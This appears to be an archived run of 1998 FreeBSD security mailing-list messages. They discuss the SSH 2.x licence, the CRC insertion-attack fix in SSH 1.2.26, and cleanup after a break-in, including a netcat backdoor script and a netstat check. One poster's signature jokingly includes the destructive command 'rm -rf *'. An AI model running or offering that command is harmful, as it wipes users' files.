(8.8.8/8.8.8) with ESMTP id JAA02741; Thu, 27 Aug 1998 09:22:37 -0700 (PDT) (envelope-from insane@the.oneinsane.net) Received: (from insane@localhost) by the.oneinsane.net (8.9.0/8.9.0) id JAA09715; Thu, 27 Aug 1998 09:21:38 -0700 (PDT) Message-ID: <19980827092138.B9553@oneinsane.net> Date: Thu, 27 Aug 1998 09:21:38 -0700 From: "Ron 'The Insane One' Rosson" To: freebsd-ports@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: SSH port Reply-To: insane@oneinsane.net Mail-Followup-To: freebsd-ports@freebsd.org, freebsd-security@freebsd.org Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93i X-Operating-System: FreeBSD the.oneinsane.net 2.2.6-STABLE X-Opinion: What you read here is my IMHO X-Disclaimer: I am a firm believer in RTFM X-WWW: http://www.oneinsane.net Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Is there a reason why we dont have a port of the ver 2.x ssh. There appears to be an insertion attack in the 1.26 version that we have in our ports. Sorry for the cross psot but theis came to my attention from running some tests on my own machines. TIA Ron -- -------------------------------------------------------- Ron Rosson ... and a UNIX user said ... The InSaNe One rm -rf * insane@oneinsane.net and all was null and void -------------------------------------------------------- It's so nice to be insane, nobody asks you to explain. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 10:00:25 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA10279 for freebsd-security-outgoing; Thu, 27 Aug 1998 10:00:25 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.numachi.com (numachi.numachi.com [198.175.254.1]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id KAA10262 for ; Thu, 27 Aug 1998 10:00:17 -0700 (PDT) (envelope-from reichert@numachi.com) Received: (qmail 29982 invoked by uid 1001); 27 Aug 1998 16:59:23 -0000 Message-ID: <19980827125922.A29892@numachi.com> Date: Thu, 27 Aug 1998 12:59:22 -0400 From: Brian Reichert To: security@FreeBSD.ORG Subject: Re: post breakin log References: <199808270538.BAA01341@armitage.cylatech.com> <1143.904199171@time.cdrom.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.91i In-Reply-To: <1143.904199171@time.cdrom.com>; from Jordan K. Hubbard on Wed, Aug 26, 1998 at 11:26:11PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Aug 26, 1998 at 11:26:11PM -0700, Jordan K. Hubbard wrote: > Watch bugtrax, www.rootshell.org, CERT, etc. I can't find a host called www.rootshell.org. Any pointers? -- Brian 'you Bastard' Reichert reichert@numachi.com 37 Crystal Ave. #303 Current daytime number: (617)-873-4337 Derry NH 03038-1713 USA Intel architecture: the left-hand path To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 10:19:33 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA12919 for freebsd-security-outgoing; Thu, 27 Aug 1998 10:19:33 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from nak.myhouse.com (nak.myhouse.com [209.70.45.162]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA12895 for ; Thu, 27 Aug 1998 10:19:18 -0700 (PDT) (envelope-from zoonie@myhouse.com) Received: from localhost (zoonie@localhost) by nak.myhouse.com (8.8.8/8.8.7) with SMTP id NAA02318; Thu, 27 Aug 1998 13:17:31 -0400 (EDT) (envelope-from zoonie@myhouse.com) X-Authentication-Warning: nak.myhouse.com: zoonie owned process doing -bs Date: Thu, 27 Aug 1998 13:17:31 -0400 (EDT) From: zoonie To: Brian Reichert cc: security@FreeBSD.ORG Subject: Re: post breakin log In-Reply-To: <19980827125922.A29892@numachi.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org it's www.rootshell.com..... On Thu, 27 Aug 1998, Brian Reichert wrote: > On Wed, Aug 26, 1998 at 11:26:11PM -0700, Jordan K. Hubbard wrote: > > Watch bugtrax, www.rootshell.org, CERT, etc. > > I can't find a host called www.rootshell.org. Any pointers? > > -- > Brian 'you Bastard' Reichert reichert@numachi.com > 37 Crystal Ave. #303 Current daytime number: (617)-873-4337 > Derry NH 03038-1713 USA Intel architecture: the left-hand path > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 10:33:43 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA15070 for freebsd-security-outgoing; Thu, 27 Aug 1998 10:33:43 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gutenberg.uoregon.edu (gutenberg.uoregon.edu [128.223.56.211]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA15065 for ; Thu, 27 Aug 1998 10:33:41 -0700 (PDT) (envelope-from sharding@gutenberg.uoregon.edu) Received: from localhost (sharding@localhost) by gutenberg.uoregon.edu (8.9.1/8.9.1) with SMTP id KAA29921; Thu, 27 Aug 1998 10:36:45 -0700 (PDT) Date: Thu, 27 Aug 1998 10:36:45 -0700 From: Sean Harding Reply-To: Sean Harding To: Brian Reichert cc: security@FreeBSD.ORG Subject: Re: post breakin log In-Reply-To: <19980827125922.A29892@numachi.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 27 Aug 1998, Brian Reichert wrote: > I can't find a host called www.rootshell.org. Any pointers? www.rootshell.com Sean -- Sean Harding sharding@oregon.uoregon.edu|"They burn their bridges as they http://gladstone.uoregon.edu/~sharding/ | go." Consulting: http://www.efn.org/~seanh | --Natalie Merchant To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 10:34:22 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA15252 for freebsd-security-outgoing; Thu, 27 Aug 1998 10:34:22 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from axl.training.iafrica.com (axl.training.iafrica.com [196.31.1.175]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA15196; Thu, 27 Aug 1998 10:34:08 -0700 (PDT) (envelope-from sheldonh@axl.training.iafrica.com) Received: from sheldonh (helo=axl.training.iafrica.com) by axl.training.iafrica.com with local-esmtp (Exim 1.92 #1) id 0zC5uc-00075E-00; Thu, 27 Aug 1998 19:32:42 +0200 From: Sheldon Hearn To: insane@oneinsane.net cc: freebsd-ports@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: SSH port In-reply-to: Your message of "Thu, 27 Aug 1998 09:21:38 MST." <19980827092138.B9553@oneinsane.net> Date: Thu, 27 Aug 1998 19:32:42 +0200 Message-ID: <27231.904239162@axl.training.iafrica.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 27 Aug 1998 09:21:38 MST, "Ron 'The Insane One' Rosson" wrote: > Is there a reason why we dont have a port of the ver 2.x > ssh. It may have something to do with the software not being freely distributable. This is from the LICENSE document in the tarball: | THERE IS NO WARRANTY OF ANY KIND FOR THIS SOFTWARE. THIS SOFTWARE IS | FOR NON-COMMERCIAL USE ONLY. | | Please contact Data Fellows for | commercial licensing. The document goes on to wrap non-commercial use up quite tightly, including the prohibition for use in administration of educational systems. You should probably look at the file yourself to be sure you qualify for a license. > Sorry for the cross psot but theis came to my attention from running > some tests on my own machines. Your problem, not ours, eh? :-) Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 10:35:08 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA15389 for freebsd-security-outgoing; Thu, 27 Aug 1998 10:35:08 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.ftf.dk (mail.ftf.dk [129.142.64.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA15376 for ; Thu, 27 Aug 1998 10:35:02 -0700 (PDT) (envelope-from regnauld@deepo.prosa.dk) Received: from mail.prosa.dk ([192.168.100.254]) by mail.ftf.dk (8.8.8/8.8.8/gw-ftf-1.0) with ESMTP id TAA12160; Thu, 27 Aug 1998 19:39:51 +0200 (CEST) (envelope-from regnauld@deepo.prosa.dk) Received: from deepo.prosa.dk (deepo.prosa.dk [192.168.100.10]) by mail.prosa.dk (8.8.8/8.8.5/prosa-1.1) with ESMTP id TAA16456; Thu, 27 Aug 1998 19:44:14 +0200 (CEST) Received: (from regnauld@localhost) by deepo.prosa.dk (8.8.8/8.8.5/prosa-1.1) id TAA01134; Thu, 27 Aug 1998 19:33:47 +0200 (CEST) Message-ID: <19980827193347.56890@deepo.prosa.dk> Date: Thu, 27 Aug 1998 19:33:47 +0200 From: Philippe Regnauld To: Brian Reichert Cc: security@FreeBSD.ORG Subject: Re: post breakin log References: <199808270538.BAA01341@armitage.cylatech.com> <1143.904199171@time.cdrom.com> <19980827125922.A29892@numachi.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.88e In-Reply-To: <19980827125922.A29892@numachi.com>; from Brian Reichert on Thu, Aug 27, 1998 at 12:59:22PM -0400 X-Operating-System: FreeBSD 2.2.6-RELEASE i386 Phone: +45 3336 4148 Address: Ahlefeldtsgade 16, 1359 Copenhagen K, Denmark Organization: PROSA Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Brian Reichert writes: > On Wed, Aug 26, 1998 at 11:26:11PM -0700, Jordan K. Hubbard wrote: > > Watch bugtrax, www.rootshell.org, CERT, etc. > > I can't find a host called www.rootshell.org. Any pointers? s/org/com/ -- -[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]- The Internet is busy. Please try again later. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 10:40:31 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA16300 for freebsd-security-outgoing; Thu, 27 Aug 1998 10:40:31 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from burka.rdy.com (burka.rdy.com [205.149.163.30]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA16182; Thu, 27 Aug 1998 10:39:50 -0700 (PDT) (envelope-from dima@burka.rdy.com) Received: (from dima@localhost) by burka.rdy.com (8.8.8/RDY&DVV) id KAA26294; Thu, 27 Aug 1998 10:38:51 -0700 (PDT) Message-Id: <199808271738.KAA26294@burka.rdy.com> Subject: Re: SSH port In-Reply-To: <19980827092138.B9553@oneinsane.net> from "Ron 'The Insane One' Rosson" at "Aug 27, 1998 9:21:38 am" To: insane@oneinsane.net Date: Thu, 27 Aug 1998 10:38:51 -0700 (PDT) Cc: freebsd-ports@FreeBSD.ORG, freebsd-security@FreeBSD.ORG X-Class: Fast Organization: HackerDome Reply-To: dima@best.net From: dima@best.net (Dima Ruban) X-Mailer: ELM [version 2.4ME+ PL45 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I'll work on this later today. Ron 'The Insane One' Rosson writes: > Is there a reason why we dont have a port of the ver 2.x > ssh. There appears to be an insertion attack in the 1.26 > version that we have in our ports. Sorry for the cross > psot but theis came to my attention from running some tests > on my own machines. > TIA > Ron > -- > -------------------------------------------------------- > Ron Rosson ... and a UNIX user said ... > The InSaNe One rm -rf * > insane@oneinsane.net and all was null and void > -------------------------------------------------------- > It's so nice to be insane, nobody asks you to explain. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- dima To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 10:45:07 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA17621 for freebsd-security-outgoing; Thu, 27 Aug 1998 10:45:07 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from axl.training.iafrica.com (axl.training.iafrica.com [196.31.1.175]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA17530 for ; Thu, 27 Aug 1998 10:44:40 -0700 (PDT) (envelope-from sheldonh@axl.training.iafrica.com) Received: from sheldonh (helo=axl.training.iafrica.com) by axl.training.iafrica.com with local-esmtp (Exim 1.92 #1) id 0zC642-00075v-00; Thu, 27 Aug 1998 19:42:26 +0200 From: Sheldon Hearn To: Brian Reichert cc: security@FreeBSD.ORG Subject: Re: post breakin log In-reply-to: Your message of "Thu, 27 Aug 1998 12:59:22 -0400." <19980827125922.A29892@numachi.com> Date: Thu, 27 Aug 1998 19:42:26 +0200 Message-ID: <27274.904239746@axl.training.iafrica.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 27 Aug 1998 12:59:22 -0400, Brian Reichert wrote: > I can't find a host called www.rootshell.org. Any pointers? Try www.rootshell.com ? Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 11:24:22 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id LAA25038 for freebsd-security-outgoing; Thu, 27 Aug 1998 11:24:22 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from hyperreal.org (taz.hyperreal.org [209.133.83.16]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id LAA25022 for ; Thu, 27 Aug 1998 11:24:15 -0700 (PDT) (envelope-from brian@hyperreal.org) Received: (qmail 6799 invoked by uid 24); 27 Aug 1998 18:23:23 -0000 Message-ID: <19980827182323.6798.qmail@hyperreal.org> X-Sender: brian@hyperreal.org X-Mailer: QUALCOMM Windows Eudora Pro Version 4.0.1 Date: Thu, 27 Aug 1998 11:16:01 -0700 To: Wilson MacGyver , security@FreeBSD.ORG From: Brian Behlendorf Subject: Re: post breakin log In-Reply-To: <199808270538.BAA01341@armitage.cylatech.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 01:38 AM 8/27/98 -0400, Wilson MacGyver wrote: >the log from history follows. Is there a fool-proof way to get user histories like this? I got one once only because the cracker was lame enough to forget to delete his .bash_history file. Presuming root isn't compromised of course... Brian --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-- "Common sense is the collection of prejudices | brian@apache.org acquired by the age of eighteen." - Einstein | brian@hyperreal.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 11:41:36 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id LAA28709 for freebsd-security-outgoing; Thu, 27 Aug 1998 11:41:36 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from the.oneinsane.net (gw.oneinsane.net [207.113.133.226]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id LAA28677; Thu, 27 Aug 1998 11:41:28 -0700 (PDT) (envelope-from insane@the.oneinsane.net) Received: (from insane@localhost) by the.oneinsane.net (8.9.0/8.9.0) id LAA12116; Thu, 27 Aug 1998 11:39:55 -0700 (PDT) Message-ID: <19980827113954.A11893@oneinsane.net> Date: Thu, 27 Aug 1998 11:39:54 -0700 From: "Ron 'The Insane One' Rosson" To: Sheldon Hearn Cc: dima@best.net, freebsd-ports@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: SSH port Reply-To: insane@oneinsane.net Mail-Followup-To: Sheldon Hearn , dima@best.net, freebsd-ports@freebsd.org, freebsd-security@freebsd.org References: <19980827092138.B9553@oneinsane.net> <27231.904239162@axl.training.iafrica.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93i In-Reply-To: <27231.904239162@axl.training.iafrica.com>; from Sheldon Hearn on Thu, Aug 27, 1998 at 07:32:42PM +0200 X-Operating-System: FreeBSD the.oneinsane.net 2.2.6-STABLE X-Opinion: What you read here is my IMHO X-Disclaimer: I am a firm believer in RTFM X-WWW: http://www.oneinsane.net Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Aug 27, 1998 at 07:32:42PM +0200, Sheldon Hearn wrote: > > > On Thu, 27 Aug 1998 09:21:38 MST, "Ron 'The Insane One' Rosson" wrote: > > > Is there a reason why we dont have a port of the ver 2.x > > ssh. > > It may have something to do with the software not being freely > distributable. This is from the LICENSE document in the tarball: > > | THERE IS NO WARRANTY OF ANY KIND FOR THIS SOFTWARE. THIS SOFTWARE IS > | FOR NON-COMMERCIAL USE ONLY. > | > | Please contact Data Fellows for > | commercial licensing. > > The document goes on to wrap non-commercial use up quite tightly, > including the prohibition for use in administration of educational > systems. You should probably look at the file yourself to be sure you > qualify for a license. Thanx for showing my ignorance. I failed to dig that deep into it. My apologies for that. After this post I am going to bear down and read the license. The thing that gets me is that the previous versions before it have always been 'freely distributable'. This is starting to smell like the same thing that happened with Xfree. I could be wrong. If anyone has nessus installed on their system and ssh also you will pick up on the possibility of an insecure ssh. Again I could e wrong and jumping in the wrong direction but it kinda rattled my cage. > > > Sorry for the cross psot but theis came to my attention from running > > some tests on my own machines. > > Your problem, not ours, eh? :-) > NP.. TIA Ron -- -------------------------------------------------------- Ron Rosson ... and a UNIX user said ... The InSaNe One rm -rf * insane@oneinsane.net and all was null and void -------------------------------------------------------- It's so nice to be insane, nobody asks you to explain. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 11:48:02 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id LAA29931 for freebsd-security-outgoing; Thu, 27 Aug 1998 11:48:02 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from burka.rdy.com (burka.rdy.com [205.149.163.30]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id LAA29894; Thu, 27 Aug 1998 11:47:46 -0700 (PDT) (envelope-from dima@burka.rdy.com) Received: (from dima@localhost) by burka.rdy.com (8.8.8/RDY&DVV) id LAA00887; Thu, 27 Aug 1998 11:46:40 -0700 (PDT) Message-Id: <199808271846.LAA00887@burka.rdy.com> Subject: Re: SSH port In-Reply-To: <19980827113954.A11893@oneinsane.net> from "Ron 'The Insane One' Rosson" at "Aug 27, 1998 11:39:54 am" To: insane@oneinsane.net Date: Thu, 27 Aug 1998 11:46:40 -0700 (PDT) Cc: axl@iafrica.com, dima@best.net, freebsd-ports@FreeBSD.ORG, freebsd-security@FreeBSD.ORG X-Class: Fast Organization: HackerDome Reply-To: dima@best.net From: dima@best.net (Dima Ruban) X-Mailer: ELM [version 2.4ME+ PL45 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Grrr, I just went through the license. Sucks. Btw, I was under impression that 1.26 has a fix for the insertion attack... Ron 'The Insane One' Rosson writes: > On Thu, Aug 27, 1998 at 07:32:42PM +0200, Sheldon Hearn wrote: > > > > > > On Thu, 27 Aug 1998 09:21:38 MST, "Ron 'The Insane One' Rosson" wrote: > > > > > Is there a reason why we dont have a port of the ver 2.x > > > ssh. > > > > It may have something to do with the software not being freely > > distributable. This is from the LICENSE document in the tarball: > > > > | THERE IS NO WARRANTY OF ANY KIND FOR THIS SOFTWARE. THIS SOFTWARE IS > > | FOR NON-COMMERCIAL USE ONLY. > > | > > | Please contact Data Fellows for > > | commercial licensing. > > > > The document goes on to wrap non-commercial use up quite tightly, > > including the prohibition for use in administration of educational > > systems. You should probably look at the file yourself to be sure you > > qualify for a license. > > Thanx for showing my ignorance. I failed to dig that deep into it. My > apologies for that. > > After this post I am going to bear down and read the license. The thing that > gets me is that the previous versions before it have always been 'freely > distributable'. This is starting to smell like the same thing > that happened with Xfree. I could be wrong. If anyone has nessus installed > on their system and ssh also you will pick up on the possibility of an > insecure ssh. Again I could e wrong and jumping in the wrong direction > but it kinda rattled my cage. > > > > > > Sorry for the cross psot but theis came to my attention from running > > > some tests on my own machines. > > > > Your problem, not ours, eh? :-) > > > NP.. > TIA > Ron > > -- > -------------------------------------------------------- > Ron Rosson ... and a UNIX user said ... > The InSaNe One rm -rf * > insane@oneinsane.net and all was null and void > -------------------------------------------------------- > It's so nice to be insane, nobody asks you to explain. > -- dima To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 11:54:34 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id LAA01713 for freebsd-security-outgoing; Thu, 27 Aug 1998 11:54:34 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from the.oneinsane.net (gw.oneinsane.net [207.113.133.226]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id LAA01642; Thu, 27 Aug 1998 11:54:17 -0700 (PDT) (envelope-from insane@the.oneinsane.net) Received: (from insane@localhost) by the.oneinsane.net (8.9.0/8.9.0) id LAA12320; Thu, 27 Aug 1998 11:52:47 -0700 (PDT) Message-ID: <19980827115247.B11893@oneinsane.net> Date: Thu, 27 Aug 1998 11:52:47 -0700 From: "Ron 'The Insane One' Rosson" To: dima@best.net Cc: axl@iafrica.com, freebsd-ports@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: SSH port Reply-To: insane@oneinsane.net Mail-Followup-To: dima@best.net, axl@iafrica.com, freebsd-ports@freebsd.org, freebsd-security@freebsd.org References: <19980827113954.A11893@oneinsane.net> <199808271846.LAA00887@burka.rdy.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93i In-Reply-To: <199808271846.LAA00887@burka.rdy.com>; from Dima Ruban on Thu, Aug 27, 1998 at 11:46:40AM -0700 X-Operating-System: FreeBSD the.oneinsane.net 2.2.6-STABLE X-Opinion: What you read here is my IMHO X-Disclaimer: I am a firm believer in RTFM X-WWW: http://www.oneinsane.net Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Aug 27, 1998 at 11:46:40AM -0700, Dima Ruban wrote: > Grrr, I just went through the license. Sucks. > Btw, I was under impression that 1.26 has a fix for the insertion attack... If you find the fix for the assertion let me know.. I would like to get this one headache cleared up. I love my ssh. > > Ron 'The Insane One' Rosson writes: > > On Thu, Aug 27, 1998 at 07:32:42PM +0200, Sheldon Hearn wrote: > > > > > > > > > On Thu, 27 Aug 1998 09:21:38 MST, "Ron 'The Insane One' Rosson" wrote: > > > > > > > Is there a reason why we dont have a port of the ver 2.x > > > > ssh. > > > > > > It may have something to do with the software not being freely > > > distributable. This is from the LICENSE document in the tarball: > > > > > > | THERE IS NO WARRANTY OF ANY KIND FOR THIS SOFTWARE. THIS SOFTWARE IS > > > | FOR NON-COMMERCIAL USE ONLY. > > > | > > > | Please contact Data Fellows for > > > | commercial licensing. > > > > > > The document goes on to wrap non-commercial use up quite tightly, > > > including the prohibition for use in administration of educational > > > systems. You should probably look at the file yourself to be sure you > > > qualify for a license. > > > > Thanx for showing my ignorance. I failed to dig that deep into it. My > > apologies for that. > > > > After this post I am going to bear down and read the license. The thing that > > gets me is that the previous versions before it have always been 'freely > > distributable'. This is starting to smell like the same thing > > that happened with Xfree. I could be wrong. If anyone has nessus installed > > on their system and ssh also you will pick up on the possibility of an > > insecure ssh. Again I could e wrong and jumping in the wrong direction > > but it kinda rattled my cage. > > > > > > > > > Sorry for the cross psot but theis came to my attention from running > > > > some tests on my own machines. > > > > > > Your problem, not ours, eh? :-) > > > > > NP.. TIA Ron -- -------------------------------------------------------- Ron Rosson ... and a UNIX user said ... The InSaNe One rm -rf * insane@oneinsane.net and all was null and void -------------------------------------------------------- It's so nice to be insane, nobody asks you to explain. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 12:09:57 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA04407 for freebsd-security-outgoing; Thu, 27 Aug 1998 12:09:57 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA04373; Thu, 27 Aug 1998 12:09:36 -0700 (PDT) (envelope-from jkb@best.com) Received: from localhost (jkb@localhost) by shell6.ba.best.com (8.9.0/8.9.0/best.sh) with SMTP id MAA21627; Thu, 27 Aug 1998 12:08:41 -0700 (PDT) X-Authentication-Warning: shell6.ba.best.com: jkb owned process doing -bs Date: Thu, 27 Aug 1998 12:08:41 -0700 (PDT) From: "Jan B. Koum " X-Sender: jkb@shell6.ba.best.com To: Gary Palmer cc: Wilson MacGyver , security@FreeBSD.ORG Subject: Re: post breakin log In-Reply-To: <10509.904217819@gjp.erols.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Arggh! I just remembered. Gary is correct If you download netcat it comes with some scripts, bnc is one of them. It will listen on a port and upon connect will drop you in to shell as root. Please do: # netstat -an | grep LIST and check to make sure you know what all the ports are. If I'd be you I'd re-install since who knows what you at going with crontab, at, mail aliases, etc. -- Yan www.best.com/~jkb/ Unix users of the world unite: www.{free,open,net}bsd.org | www.linux.org | www.apache.org | www.perl.com "Turn up the lights, I don't want to go home in the dark." On Thu, 27 Aug 1998, Gary Palmer wrote: >Wilson MacGyver wrote in message ID ><199808270538.BAA01341@armitage.cylatech.com>: >> From the log, it seem he is very knowledgeable about FreeBSD. >> though I must admit, I don't get why he makes the /dev/sync. >> also, I don't know what the deal with the bnc* stuff > >Where better to hide something than in a directory filled with stuff no-one >looks at? And even if they did look at, then they'd never remember if it was >there or not before :) > >bnc is probably a backdoor program running on a different port > >Gary >-- >Gary Palmer FreeBSD Core Team Member >FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 12:17:44 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA06071 for freebsd-security-outgoing; Thu, 27 Aug 1998 12:17:44 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from burka.rdy.com (burka.rdy.com [205.149.163.30]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA06039; Thu, 27 Aug 1998 12:17:29 -0700 (PDT) (envelope-from dima@burka.rdy.com) Received: (from dima@localhost) by burka.rdy.com (8.8.8/RDY&DVV) id MAA01652; Thu, 27 Aug 1998 12:16:03 -0700 (PDT) Message-Id: <199808271916.MAA01652@burka.rdy.com> Subject: Re: SSH port In-Reply-To: <19980827115247.B11893@oneinsane.net> from "Ron 'The Insane One' Rosson" at "Aug 27, 1998 11:52:47 am" To: insane@oneinsane.net Date: Thu, 27 Aug 1998 12:16:03 -0700 (PDT) Cc: dima@best.net, axl@iafrica.com, freebsd-ports@FreeBSD.ORG, freebsd-security@FreeBSD.ORG X-Class: Fast Organization: HackerDome Reply-To: dima@best.net From: dima@best.net (Dima Ruban) X-Mailer: ELM [version 2.4ME+ PL45 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Ron 'The Insane One' Rosson writes: > On Thu, Aug 27, 1998 at 11:46:40AM -0700, Dima Ruban wrote: > > Grrr, I just went through the license. Sucks. > > Btw, I was under impression that 1.26 has a fix for the insertion attack... > > If you find the fix for the assertion let me know.. I would like to get this > one headache cleared up. I love my ssh. > Well, from ChangeLog of 1.2.26 version: Tue Jul 7 22:38:41 1998 Tero Kivinen [skipped] * Updated deattack code to new version (fixes some bug in check_crc function. New code from CORE SDI S.A., Buenos Aires, Argentina. Thu Jun 11 01:05:28 1998 Tero Kivinen [skipped] * Added crc-fix detection code from CORE SDI S.A., Buenos Aires, Argentina. See their security announcement for more information. Or are you talking about something else? -- dima To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 12:24:05 1998 Return-Path: Received: 